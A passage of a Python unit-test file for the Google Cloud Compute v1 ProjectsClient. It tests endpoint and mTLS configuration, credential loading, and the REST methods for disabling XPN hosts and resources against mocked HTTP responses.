| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0d918a5032aaeae6b46c566ad9d111ac5e31bbbc
| 155,961
|
py
|
Python
|
tests/unit/gapic/compute_v1/test_projects.py
|
LaudateCorpus1/python-compute
|
a36c637f153c7b4ef49bb6a78c8b09f3746e7af1
|
[
"Apache-2.0"
] | null | null | null |
tests/unit/gapic/compute_v1/test_projects.py
|
LaudateCorpus1/python-compute
|
a36c637f153c7b4ef49bb6a78c8b09f3746e7af1
|
[
"Apache-2.0"
] | null | null | null |
tests/unit/gapic/compute_v1/test_projects.py
|
LaudateCorpus1/python-compute
|
a36c637f153c7b4ef49bb6a78c8b09f3746e7af1
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import mock
import grpc
from grpc.experimental import aio
import json
import math
import pytest
from proto.marshal.rules.dates import DurationRule, TimestampRule
from requests import Response
from requests import Request, PreparedRequest
from requests.sessions import Session
from google.api_core import client_options
from google.api_core import exceptions as core_exceptions
from google.api_core import gapic_v1
from google.api_core import grpc_helpers
from google.api_core import grpc_helpers_async
from google.api_core import path_template
from google.auth import credentials as ga_credentials
from google.auth.exceptions import MutualTLSChannelError
from google.cloud.compute_v1.services.projects import ProjectsClient
from google.cloud.compute_v1.services.projects import pagers
from google.cloud.compute_v1.services.projects import transports
from google.cloud.compute_v1.types import compute
from google.oauth2 import service_account
import google.auth
def client_cert_source_callback():
    """Dummy client-certificate provider handed to mTLS client options."""
    cert_bytes = b"cert bytes"
    key_bytes = b"key bytes"
    return cert_bytes, key_bytes
# If the client's default endpoint is localhost, its default mTLS endpoint
# would be localhost too.  Substituting a fake public hostname gives the
# endpoint-derivation tests something meaningful to transform.
def modify_default_endpoint(client):
    """Return the endpoint the tests should treat as *client*'s default."""
    endpoint = client.DEFAULT_ENDPOINT
    if "localhost" in endpoint:
        return "foo.googleapis.com"
    return endpoint
def test__get_default_mtls_endpoint():
    """``_get_default_mtls_endpoint`` inserts ``mtls`` only for googleapis hosts."""
    # input -> expected output; non-googleapis hosts and None pass through,
    # already-mtls hosts are idempotent.
    expectations = {
        None: None,
        "example.googleapis.com": "example.mtls.googleapis.com",
        "example.mtls.googleapis.com": "example.mtls.googleapis.com",
        "example.sandbox.googleapis.com": "example.mtls.sandbox.googleapis.com",
        "example.mtls.sandbox.googleapis.com": "example.mtls.sandbox.googleapis.com",
        "api.example.com": "api.example.com",
    }
    for endpoint, expected in expectations.items():
        assert ProjectsClient._get_default_mtls_endpoint(endpoint) == expected
@pytest.mark.parametrize("client_class", [ProjectsClient,])
def test_projects_client_from_service_account_info(client_class):
    """``from_service_account_info`` must build a client around the parsed creds."""
    anon_creds = ga_credentials.AnonymousCredentials()
    patcher = mock.patch.object(
        service_account.Credentials, "from_service_account_info"
    )
    with patcher as factory:
        factory.return_value = anon_creds
        client = client_class.from_service_account_info({"valid": True})
        # The mocked credentials must end up on the transport unchanged.
        assert client.transport._credentials == anon_creds
        assert isinstance(client, client_class)
        assert client.transport._host == "compute.googleapis.com:443"
@pytest.mark.parametrize(
    "transport_class,transport_name", [(transports.ProjectsRestTransport, "rest"),]
)
def test_projects_client_service_account_always_use_jwt(
    transport_class, transport_name
):
    """JWT access is requested on the creds iff ``always_use_jwt_access=True``."""
    for jwt_enabled in (True, False):
        with mock.patch.object(
            service_account.Credentials, "with_always_use_jwt_access", create=True
        ) as use_jwt:
            creds = service_account.Credentials(None, None, None)
            transport_class(credentials=creds, always_use_jwt_access=jwt_enabled)
            if jwt_enabled:
                use_jwt.assert_called_once_with(True)
            else:
                use_jwt.assert_not_called()
@pytest.mark.parametrize("client_class", [ProjectsClient,])
def test_projects_client_from_service_account_file(client_class):
    """File- and JSON-based constructors both wire the mocked creds in."""
    anon_creds = ga_credentials.AnonymousCredentials()
    with mock.patch.object(
        service_account.Credentials, "from_service_account_file"
    ) as factory:
        factory.return_value = anon_creds
        # Exercise both entry points; they should behave identically here.
        for constructor in (
            client_class.from_service_account_file,
            client_class.from_service_account_json,
        ):
            client = constructor("dummy/file/path.json")
            assert client.transport._credentials == anon_creds
            assert isinstance(client, client_class)
        assert client.transport._host == "compute.googleapis.com:443"
def test_projects_client_get_transport_class():
    """Both the default and the explicitly named transport resolve to REST."""
    default_transport = ProjectsClient.get_transport_class()
    assert default_transport in [transports.ProjectsRestTransport]
    named_transport = ProjectsClient.get_transport_class("rest")
    assert named_transport == transports.ProjectsRestTransport
@pytest.mark.parametrize(
    "client_class,transport_class,transport_name",
    [(ProjectsClient, transports.ProjectsRestTransport, "rest"),],
)
@mock.patch.object(
    ProjectsClient, "DEFAULT_ENDPOINT", modify_default_endpoint(ProjectsClient)
)
def test_projects_client_client_options(client_class, transport_class, transport_name):
    """Verify how ``ClientOptions`` and env vars shape transport construction.

    Walks through: pre-built transport, transport-by-name, explicit
    ``api_endpoint``, the three GOOGLE_API_USE_MTLS_ENDPOINT settings
    (never / always / unsupported), an unsupported
    GOOGLE_API_USE_CLIENT_CERTIFICATE value, and ``quota_project_id``.
    """
    # Check that if channel is provided we won't create a new one.
    with mock.patch.object(ProjectsClient, "get_transport_class") as gtc:
        transport = transport_class(credentials=ga_credentials.AnonymousCredentials())
        client = client_class(transport=transport)
        gtc.assert_not_called()
    # Check that if channel is provided via str we will create a new one.
    with mock.patch.object(ProjectsClient, "get_transport_class") as gtc:
        client = client_class(transport=transport_name)
        gtc.assert_called()
    # Check the case api_endpoint is provided.
    options = client_options.ClientOptions(api_endpoint="squid.clam.whelk")
    with mock.patch.object(transport_class, "__init__") as patched:
        patched.return_value = None
        client = client_class(transport=transport_name, client_options=options)
        # The explicit endpoint must win over DEFAULT_ENDPOINT.
        patched.assert_called_once_with(
            credentials=None,
            credentials_file=None,
            host="squid.clam.whelk",
            scopes=None,
            client_cert_source_for_mtls=None,
            quota_project_id=None,
            client_info=transports.base.DEFAULT_CLIENT_INFO,
            always_use_jwt_access=True,
        )
    # Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT is
    # "never".
    with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "never"}):
        with mock.patch.object(transport_class, "__init__") as patched:
            patched.return_value = None
            client = client_class(transport=transport_name)
            patched.assert_called_once_with(
                credentials=None,
                credentials_file=None,
                host=client.DEFAULT_ENDPOINT,
                scopes=None,
                client_cert_source_for_mtls=None,
                quota_project_id=None,
                client_info=transports.base.DEFAULT_CLIENT_INFO,
                always_use_jwt_access=True,
            )
    # Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT is
    # "always".
    with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "always"}):
        with mock.patch.object(transport_class, "__init__") as patched:
            patched.return_value = None
            client = client_class(transport=transport_name)
            patched.assert_called_once_with(
                credentials=None,
                credentials_file=None,
                host=client.DEFAULT_MTLS_ENDPOINT,
                scopes=None,
                client_cert_source_for_mtls=None,
                quota_project_id=None,
                client_info=transports.base.DEFAULT_CLIENT_INFO,
                always_use_jwt_access=True,
            )
    # Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT has
    # unsupported value.
    with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "Unsupported"}):
        with pytest.raises(MutualTLSChannelError):
            client = client_class(transport=transport_name)
    # Check the case GOOGLE_API_USE_CLIENT_CERTIFICATE has unsupported value.
    with mock.patch.dict(
        os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": "Unsupported"}
    ):
        with pytest.raises(ValueError):
            client = client_class(transport=transport_name)
    # Check the case quota_project_id is provided
    options = client_options.ClientOptions(quota_project_id="octopus")
    with mock.patch.object(transport_class, "__init__") as patched:
        patched.return_value = None
        client = client_class(client_options=options, transport=transport_name)
        patched.assert_called_once_with(
            credentials=None,
            credentials_file=None,
            host=client.DEFAULT_ENDPOINT,
            scopes=None,
            client_cert_source_for_mtls=None,
            quota_project_id="octopus",
            client_info=transports.base.DEFAULT_CLIENT_INFO,
            always_use_jwt_access=True,
        )
@pytest.mark.parametrize(
    "client_class,transport_class,transport_name,use_client_cert_env",
    [
        (ProjectsClient, transports.ProjectsRestTransport, "rest", "true"),
        (ProjectsClient, transports.ProjectsRestTransport, "rest", "false"),
    ],
)
@mock.patch.object(
    ProjectsClient, "DEFAULT_ENDPOINT", modify_default_endpoint(ProjectsClient)
)
@mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "auto"})
def test_projects_client_mtls_env_auto(
    client_class, transport_class, transport_name, use_client_cert_env
):
    """With GOOGLE_API_USE_MTLS_ENDPOINT=auto, the client must switch to the
    mTLS endpoint exactly when a client certificate is available AND
    GOOGLE_API_USE_CLIENT_CERTIFICATE is "true"; otherwise it must stay on the
    default endpoint with no cert source. Three scenarios are covered: an
    explicit cert source in ClientOptions, an ADC-provided cert, and no cert.
    """
    # This tests the endpoint autoswitch behavior. Endpoint is autoswitched to the default
    # mtls endpoint, if GOOGLE_API_USE_CLIENT_CERTIFICATE is "true" and client cert exists.
    # Check the case client_cert_source is provided. Whether client cert is used depends on
    # GOOGLE_API_USE_CLIENT_CERTIFICATE value.
    with mock.patch.dict(
        os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}
    ):
        options = client_options.ClientOptions(
            client_cert_source=client_cert_source_callback
        )
        with mock.patch.object(transport_class, "__init__") as patched:
            patched.return_value = None
            client = client_class(client_options=options, transport=transport_name)
            if use_client_cert_env == "false":
                expected_client_cert_source = None
                expected_host = client.DEFAULT_ENDPOINT
            else:
                expected_client_cert_source = client_cert_source_callback
                expected_host = client.DEFAULT_MTLS_ENDPOINT
            patched.assert_called_once_with(
                credentials=None,
                credentials_file=None,
                host=expected_host,
                scopes=None,
                client_cert_source_for_mtls=expected_client_cert_source,
                quota_project_id=None,
                client_info=transports.base.DEFAULT_CLIENT_INFO,
                always_use_jwt_access=True,
            )
    # Check the case ADC client cert is provided. Whether client cert is used depends on
    # GOOGLE_API_USE_CLIENT_CERTIFICATE value.
    with mock.patch.dict(
        os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}
    ):
        with mock.patch.object(transport_class, "__init__") as patched:
            with mock.patch(
                "google.auth.transport.mtls.has_default_client_cert_source",
                return_value=True,
            ):
                with mock.patch(
                    "google.auth.transport.mtls.default_client_cert_source",
                    return_value=client_cert_source_callback,
                ):
                    # NOTE(review): `client` below still refers to the instance
                    # created in the previous scenario; the new client is only
                    # constructed after these expected values are computed.
                    # Works because DEFAULT_ENDPOINT / DEFAULT_MTLS_ENDPOINT
                    # are class-level attributes, but it reads oddly.
                    if use_client_cert_env == "false":
                        expected_host = client.DEFAULT_ENDPOINT
                        expected_client_cert_source = None
                    else:
                        expected_host = client.DEFAULT_MTLS_ENDPOINT
                        expected_client_cert_source = client_cert_source_callback
                    patched.return_value = None
                    client = client_class(transport=transport_name)
                    patched.assert_called_once_with(
                        credentials=None,
                        credentials_file=None,
                        host=expected_host,
                        scopes=None,
                        client_cert_source_for_mtls=expected_client_cert_source,
                        quota_project_id=None,
                        client_info=transports.base.DEFAULT_CLIENT_INFO,
                        always_use_jwt_access=True,
                    )
    # Check the case client_cert_source and ADC client cert are not provided.
    with mock.patch.dict(
        os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}
    ):
        with mock.patch.object(transport_class, "__init__") as patched:
            with mock.patch(
                "google.auth.transport.mtls.has_default_client_cert_source",
                return_value=False,
            ):
                patched.return_value = None
                client = client_class(transport=transport_name)
                patched.assert_called_once_with(
                    credentials=None,
                    credentials_file=None,
                    host=client.DEFAULT_ENDPOINT,
                    scopes=None,
                    client_cert_source_for_mtls=None,
                    quota_project_id=None,
                    client_info=transports.base.DEFAULT_CLIENT_INFO,
                    always_use_jwt_access=True,
                )
@pytest.mark.parametrize("client_class", [ProjectsClient])
@mock.patch.object(
    ProjectsClient, "DEFAULT_ENDPOINT", modify_default_endpoint(ProjectsClient)
)
def test_projects_client_get_mtls_endpoint_and_cert_source(client_class):
    """get_mtls_endpoint_and_cert_source() must honor the
    GOOGLE_API_USE_CLIENT_CERTIFICATE and GOOGLE_API_USE_MTLS_ENDPOINT
    environment variables when resolving the (endpoint, cert_source) pair,
    covering explicit options, "never"/"always", and both "auto" outcomes.
    """
    mock_client_cert_source = mock.Mock()
    # Test the case GOOGLE_API_USE_CLIENT_CERTIFICATE is "true".
    with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": "true"}):
        mock_api_endpoint = "foo"
        options = client_options.ClientOptions(
            client_cert_source=mock_client_cert_source, api_endpoint=mock_api_endpoint
        )
        api_endpoint, cert_source = client_class.get_mtls_endpoint_and_cert_source(
            options
        )
        assert api_endpoint == mock_api_endpoint
        assert cert_source == mock_client_cert_source
    # Test the case GOOGLE_API_USE_CLIENT_CERTIFICATE is "false".
    with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": "false"}):
        mock_client_cert_source = mock.Mock()
        mock_api_endpoint = "foo"
        options = client_options.ClientOptions(
            client_cert_source=mock_client_cert_source, api_endpoint=mock_api_endpoint
        )
        api_endpoint, cert_source = client_class.get_mtls_endpoint_and_cert_source(
            options
        )
        assert api_endpoint == mock_api_endpoint
        assert cert_source is None
    # Test the case GOOGLE_API_USE_MTLS_ENDPOINT is "never".
    with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "never"}):
        api_endpoint, cert_source = client_class.get_mtls_endpoint_and_cert_source()
        assert api_endpoint == client_class.DEFAULT_ENDPOINT
        assert cert_source is None
    # Test the case GOOGLE_API_USE_MTLS_ENDPOINT is "always".
    with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "always"}):
        api_endpoint, cert_source = client_class.get_mtls_endpoint_and_cert_source()
        assert api_endpoint == client_class.DEFAULT_MTLS_ENDPOINT
        assert cert_source is None
    # Test the case GOOGLE_API_USE_MTLS_ENDPOINT is "auto" and default cert doesn't exist.
    with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": "true"}):
        with mock.patch(
            "google.auth.transport.mtls.has_default_client_cert_source",
            return_value=False,
        ):
            api_endpoint, cert_source = client_class.get_mtls_endpoint_and_cert_source()
            assert api_endpoint == client_class.DEFAULT_ENDPOINT
            assert cert_source is None
    # Test the case GOOGLE_API_USE_MTLS_ENDPOINT is "auto" and default cert exists.
    with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": "true"}):
        with mock.patch(
            "google.auth.transport.mtls.has_default_client_cert_source",
            return_value=True,
        ):
            with mock.patch(
                "google.auth.transport.mtls.default_client_cert_source",
                return_value=mock_client_cert_source,
            ):
                (
                    api_endpoint,
                    cert_source,
                ) = client_class.get_mtls_endpoint_and_cert_source()
                assert api_endpoint == client_class.DEFAULT_MTLS_ENDPOINT
                assert cert_source == mock_client_cert_source
@pytest.mark.parametrize(
    "client_class,transport_class,transport_name",
    [(ProjectsClient, transports.ProjectsRestTransport, "rest"),],
)
def test_projects_client_client_options_scopes(
    client_class, transport_class, transport_name
):
    """Scopes configured via ClientOptions are forwarded verbatim to the transport."""
    client_opts = client_options.ClientOptions(scopes=["1", "2"],)
    with mock.patch.object(transport_class, "__init__") as init_mock:
        init_mock.return_value = None
        client = client_class(client_options=client_opts, transport=transport_name)
        # The transport constructor must receive exactly the configured scopes.
        init_mock.assert_called_once_with(
            credentials=None,
            credentials_file=None,
            host=client.DEFAULT_ENDPOINT,
            scopes=["1", "2"],
            client_cert_source_for_mtls=None,
            quota_project_id=None,
            client_info=transports.base.DEFAULT_CLIENT_INFO,
            always_use_jwt_access=True,
        )
@pytest.mark.parametrize(
    "client_class,transport_class,transport_name",
    [(ProjectsClient, transports.ProjectsRestTransport, "rest"),],
)
def test_projects_client_client_options_credentials_file(
    client_class, transport_class, transport_name
):
    """A credentials file named in ClientOptions is forwarded to the transport."""
    client_opts = client_options.ClientOptions(credentials_file="credentials.json")
    with mock.patch.object(transport_class, "__init__") as init_mock:
        init_mock.return_value = None
        client = client_class(client_options=client_opts, transport=transport_name)
        # The transport constructor must receive the configured file path.
        init_mock.assert_called_once_with(
            credentials=None,
            credentials_file="credentials.json",
            host=client.DEFAULT_ENDPOINT,
            scopes=None,
            client_cert_source_for_mtls=None,
            quota_project_id=None,
            client_info=transports.base.DEFAULT_CLIENT_INFO,
            always_use_jwt_access=True,
        )
@pytest.mark.parametrize("request_type", [compute.DisableXpnHostProjectRequest, dict,])
def test_disable_xpn_host_unary_rest(request_type):
    """disable_xpn_host_unary over REST returns a compute.Operation whose
    fields mirror the JSON payload served by the mocked HTTP session, for both
    a proto request object and a plain dict.
    """
    client = ProjectsClient(
        credentials=ga_credentials.AnonymousCredentials(), transport="rest",
    )
    # send a request that will satisfy transcoding
    request_init = {"project": "sample1"}
    request = request_type(request_init)
    # Mock the http request call within the method and fake a response.
    with mock.patch.object(type(client.transport._session), "request") as req:
        # Designate an appropriate value for the returned response.
        return_value = compute.Operation(
            client_operation_id="client_operation_id_value",
            creation_timestamp="creation_timestamp_value",
            description="description_value",
            end_time="end_time_value",
            http_error_message="http_error_message_value",
            http_error_status_code=2374,
            id=205,
            insert_time="insert_time_value",
            kind="kind_value",
            name="name_value",
            operation_group_id="operation_group_id_value",
            operation_type="operation_type_value",
            progress=885,
            region="region_value",
            self_link="self_link_value",
            start_time="start_time_value",
            status=compute.Operation.Status.DONE,
            status_message="status_message_value",
            target_id=947,
            target_link="target_link_value",
            user="user_value",
            zone="zone_value",
        )
        # Wrap the value into a proper Response obj
        response_value = Response()
        response_value.status_code = 200
        json_return_value = compute.Operation.to_json(return_value)
        response_value._content = json_return_value.encode("UTF-8")
        req.return_value = response_value
        response = client.disable_xpn_host_unary(request)
    # Establish that the response is the type that we expect.
    assert isinstance(response, compute.Operation)
    assert response.client_operation_id == "client_operation_id_value"
    assert response.creation_timestamp == "creation_timestamp_value"
    assert response.description == "description_value"
    assert response.end_time == "end_time_value"
    assert response.http_error_message == "http_error_message_value"
    assert response.http_error_status_code == 2374
    assert response.id == 205
    assert response.insert_time == "insert_time_value"
    assert response.kind == "kind_value"
    assert response.name == "name_value"
    assert response.operation_group_id == "operation_group_id_value"
    assert response.operation_type == "operation_type_value"
    assert response.progress == 885
    assert response.region == "region_value"
    assert response.self_link == "self_link_value"
    assert response.start_time == "start_time_value"
    assert response.status == compute.Operation.Status.DONE
    assert response.status_message == "status_message_value"
    assert response.target_id == 947
    assert response.target_link == "target_link_value"
    assert response.user == "user_value"
    assert response.zone == "zone_value"
def test_disable_xpn_host_unary_rest_required_fields(
    request_type=compute.DisableXpnHostProjectRequest,
):
    """Required-field handling for disable_xpn_host: default-valued required
    fields are reported as unset, explicitly-set ones survive, and the call
    succeeds with transcoding mocked so no path params are demanded.
    """
    transport_class = transports.ProjectsRestTransport
    request_init = {}
    request_init["project"] = ""
    request = request_type(request_init)
    jsonified_request = json.loads(
        request_type.to_json(
            request, including_default_value_fields=False, use_integers_for_enums=False
        )
    )
    # verify fields with default values are dropped
    unset_fields = transport_class(
        credentials=ga_credentials.AnonymousCredentials()
    ).disable_xpn_host._get_unset_required_fields(jsonified_request)
    jsonified_request.update(unset_fields)
    # verify required fields with default values are now present
    jsonified_request["project"] = "project_value"
    unset_fields = transport_class(
        credentials=ga_credentials.AnonymousCredentials()
    ).disable_xpn_host._get_unset_required_fields(jsonified_request)
    # Check that path parameters and body parameters are not mixing in.
    assert not set(unset_fields) - set(("request_id",))
    jsonified_request.update(unset_fields)
    # verify required fields with non-default values are left alone
    assert "project" in jsonified_request
    assert jsonified_request["project"] == "project_value"
    client = ProjectsClient(
        credentials=ga_credentials.AnonymousCredentials(), transport="rest",
    )
    request = request_type(request_init)
    # Designate an appropriate value for the returned response.
    return_value = compute.Operation()
    # Mock the http request call within the method and fake a response.
    with mock.patch.object(Session, "request") as req:
        # We need to mock transcode() because providing default values
        # for required fields will fail the real version if the http_options
        # expect actual values for those fields.
        with mock.patch.object(path_template, "transcode") as transcode:
            # A uri without fields and an empty body will force all the
            # request fields to show up in the query_params.
            transcode_result = {
                "uri": "v1/sample_method",
                "method": "post",
                "query_params": request_init,
            }
            transcode.return_value = transcode_result
            response_value = Response()
            response_value.status_code = 200
            json_return_value = compute.Operation.to_json(return_value)
            response_value._content = json_return_value.encode("UTF-8")
            req.return_value = response_value
            response = client.disable_xpn_host_unary(request)
            # No extra query params should be injected by the method itself.
            expected_params = []
            actual_params = req.call_args.kwargs["params"]
            assert expected_params == actual_params
def test_disable_xpn_host_unary_rest_unset_required_fields():
    """The unset-required-fields helper for disable_xpn_host reports only
    `requestId` intersected with the method's required fields.

    Fix: pass an AnonymousCredentials *instance* to the transport — the
    original passed the class object itself, which only worked by accident
    and is inconsistent with every other construction in this file.
    """
    transport = transports.ProjectsRestTransport(
        credentials=ga_credentials.AnonymousCredentials()
    )
    unset_fields = transport.disable_xpn_host._get_unset_required_fields({})
    assert set(unset_fields) == (set(("requestId",)) & set(("project",)))
def test_disable_xpn_host_unary_rest_bad_request(
    transport: str = "rest", request_type=compute.DisableXpnHostProjectRequest
):
    """An HTTP 400 from the REST session surfaces as core_exceptions.BadRequest."""
    client = ProjectsClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )
    # Build a request whose fields satisfy the URI transcoding rules.
    request = request_type({"project": "sample1"})
    # Fake a 400 response from the underlying HTTP session.
    bad_response = Response()
    bad_response.status_code = 400
    bad_response.request = Request()
    with mock.patch.object(Session, "request") as mocked_request:
        mocked_request.return_value = bad_response
        with pytest.raises(core_exceptions.BadRequest):
            client.disable_xpn_host_unary(request)
def test_disable_xpn_host_unary_rest_flattened():
    """Flattened arguments are expanded into the expected disableXpnHost URI."""
    client = ProjectsClient(
        credentials=ga_credentials.AnonymousCredentials(), transport="rest",
    )
    with mock.patch.object(type(client.transport._session), "request") as req:
        # Fake a successful (empty) Operation response from the session.
        ok_response = Response()
        ok_response.status_code = 200
        ok_response._content = compute.Operation.to_json(compute.Operation()).encode(
            "UTF-8"
        )
        req.return_value = ok_response
        # Truthy flattened fields, overridden by path params satisfying the
        # http rule for this method.
        call_kwargs = dict(project="project_value",)
        call_kwargs.update({"project": "sample1"})
        client.disable_xpn_host_unary(**call_kwargs)
        # Exactly one HTTP call, aimed at the disableXpnHost URI.
        assert len(req.mock_calls) == 1
        _, args, _ = req.mock_calls[0]
        assert path_template.validate(
            "https://%s/compute/v1/projects/{project}/disableXpnHost"
            % client.transport._host,
            args[1],
        )
def test_disable_xpn_host_unary_rest_flattened_error(transport: str = "rest"):
    """Mixing a request object with flattened fields must raise ValueError."""
    client = ProjectsClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )
    request_object = compute.DisableXpnHostProjectRequest()
    # Supplying both a request object and flattened fields is ambiguous,
    # so the client refuses the call.
    with pytest.raises(ValueError):
        client.disable_xpn_host_unary(request_object, project="project_value")
def test_disable_xpn_host_unary_rest_error():
    """Constructing a REST client with anonymous credentials succeeds."""
    creds = ga_credentials.AnonymousCredentials()
    ProjectsClient(credentials=creds, transport="rest")
@pytest.mark.parametrize(
    "request_type", [compute.DisableXpnResourceProjectRequest, dict,]
)
def test_disable_xpn_resource_unary_rest(request_type):
    """disable_xpn_resource_unary over REST (with a request body resource)
    returns a compute.Operation whose fields mirror the JSON payload served by
    the mocked HTTP session, for both a proto request object and a plain dict.
    """
    client = ProjectsClient(
        credentials=ga_credentials.AnonymousCredentials(), transport="rest",
    )
    # send a request that will satisfy transcoding
    request_init = {"project": "sample1"}
    request_init["projects_disable_xpn_resource_request_resource"] = {
        "xpn_resource": {"id": "id_value", "type_": "type__value"}
    }
    request = request_type(request_init)
    # Mock the http request call within the method and fake a response.
    with mock.patch.object(type(client.transport._session), "request") as req:
        # Designate an appropriate value for the returned response.
        return_value = compute.Operation(
            client_operation_id="client_operation_id_value",
            creation_timestamp="creation_timestamp_value",
            description="description_value",
            end_time="end_time_value",
            http_error_message="http_error_message_value",
            http_error_status_code=2374,
            id=205,
            insert_time="insert_time_value",
            kind="kind_value",
            name="name_value",
            operation_group_id="operation_group_id_value",
            operation_type="operation_type_value",
            progress=885,
            region="region_value",
            self_link="self_link_value",
            start_time="start_time_value",
            status=compute.Operation.Status.DONE,
            status_message="status_message_value",
            target_id=947,
            target_link="target_link_value",
            user="user_value",
            zone="zone_value",
        )
        # Wrap the value into a proper Response obj
        response_value = Response()
        response_value.status_code = 200
        json_return_value = compute.Operation.to_json(return_value)
        response_value._content = json_return_value.encode("UTF-8")
        req.return_value = response_value
        response = client.disable_xpn_resource_unary(request)
    # Establish that the response is the type that we expect.
    assert isinstance(response, compute.Operation)
    assert response.client_operation_id == "client_operation_id_value"
    assert response.creation_timestamp == "creation_timestamp_value"
    assert response.description == "description_value"
    assert response.end_time == "end_time_value"
    assert response.http_error_message == "http_error_message_value"
    assert response.http_error_status_code == 2374
    assert response.id == 205
    assert response.insert_time == "insert_time_value"
    assert response.kind == "kind_value"
    assert response.name == "name_value"
    assert response.operation_group_id == "operation_group_id_value"
    assert response.operation_type == "operation_type_value"
    assert response.progress == 885
    assert response.region == "region_value"
    assert response.self_link == "self_link_value"
    assert response.start_time == "start_time_value"
    assert response.status == compute.Operation.Status.DONE
    assert response.status_message == "status_message_value"
    assert response.target_id == 947
    assert response.target_link == "target_link_value"
    assert response.user == "user_value"
    assert response.zone == "zone_value"
def test_disable_xpn_resource_unary_rest_required_fields(
    request_type=compute.DisableXpnResourceProjectRequest,
):
    """Required-field handling for disable_xpn_resource: default-valued
    required fields are reported as unset, explicitly-set ones survive, and
    the call succeeds with transcoding mocked (this method carries a body).
    """
    transport_class = transports.ProjectsRestTransport
    request_init = {}
    request_init["project"] = ""
    request = request_type(request_init)
    jsonified_request = json.loads(
        request_type.to_json(
            request, including_default_value_fields=False, use_integers_for_enums=False
        )
    )
    # verify fields with default values are dropped
    unset_fields = transport_class(
        credentials=ga_credentials.AnonymousCredentials()
    ).disable_xpn_resource._get_unset_required_fields(jsonified_request)
    jsonified_request.update(unset_fields)
    # verify required fields with default values are now present
    jsonified_request["project"] = "project_value"
    unset_fields = transport_class(
        credentials=ga_credentials.AnonymousCredentials()
    ).disable_xpn_resource._get_unset_required_fields(jsonified_request)
    # Check that path parameters and body parameters are not mixing in.
    assert not set(unset_fields) - set(("request_id",))
    jsonified_request.update(unset_fields)
    # verify required fields with non-default values are left alone
    assert "project" in jsonified_request
    assert jsonified_request["project"] == "project_value"
    client = ProjectsClient(
        credentials=ga_credentials.AnonymousCredentials(), transport="rest",
    )
    request = request_type(request_init)
    # Designate an appropriate value for the returned response.
    return_value = compute.Operation()
    # Mock the http request call within the method and fake a response.
    with mock.patch.object(Session, "request") as req:
        # We need to mock transcode() because providing default values
        # for required fields will fail the real version if the http_options
        # expect actual values for those fields.
        with mock.patch.object(path_template, "transcode") as transcode:
            # A uri without fields and an empty body will force all the
            # request fields to show up in the query_params.
            transcode_result = {
                "uri": "v1/sample_method",
                "method": "post",
                "query_params": request_init,
            }
            # This method sends a request body, so transcode must report one.
            transcode_result["body"] = {}
            transcode.return_value = transcode_result
            response_value = Response()
            response_value.status_code = 200
            json_return_value = compute.Operation.to_json(return_value)
            response_value._content = json_return_value.encode("UTF-8")
            req.return_value = response_value
            response = client.disable_xpn_resource_unary(request)
            # No extra query params should be injected by the method itself.
            expected_params = []
            actual_params = req.call_args.kwargs["params"]
            assert expected_params == actual_params
def test_disable_xpn_resource_unary_rest_unset_required_fields():
    """The unset-required-fields helper for disable_xpn_resource reports
    `requestId` intersected with the method's required fields.

    Fix: pass an AnonymousCredentials *instance* to the transport — the
    original passed the class object itself, which only worked by accident
    and is inconsistent with every other construction in this file.
    """
    transport = transports.ProjectsRestTransport(
        credentials=ga_credentials.AnonymousCredentials()
    )
    unset_fields = transport.disable_xpn_resource._get_unset_required_fields({})
    assert set(unset_fields) == (
        set(("requestId",))
        & set(("project", "projectsDisableXpnResourceRequestResource",))
    )
def test_disable_xpn_resource_unary_rest_bad_request(
    transport: str = "rest", request_type=compute.DisableXpnResourceProjectRequest
):
    """An HTTP 400 from the REST session surfaces as core_exceptions.BadRequest."""
    client = ProjectsClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )
    # Build a request (path field + body resource) satisfying transcoding.
    request = request_type(
        {
            "project": "sample1",
            "projects_disable_xpn_resource_request_resource": {
                "xpn_resource": {"id": "id_value", "type_": "type__value"}
            },
        }
    )
    # Fake a 400 response from the underlying HTTP session.
    bad_response = Response()
    bad_response.status_code = 400
    bad_response.request = Request()
    with mock.patch.object(Session, "request") as mocked_request:
        mocked_request.return_value = bad_response
        with pytest.raises(core_exceptions.BadRequest):
            client.disable_xpn_resource_unary(request)
def test_disable_xpn_resource_unary_rest_flattened():
    """Flattened arguments are expanded into the expected disableXpnResource URI."""
    client = ProjectsClient(
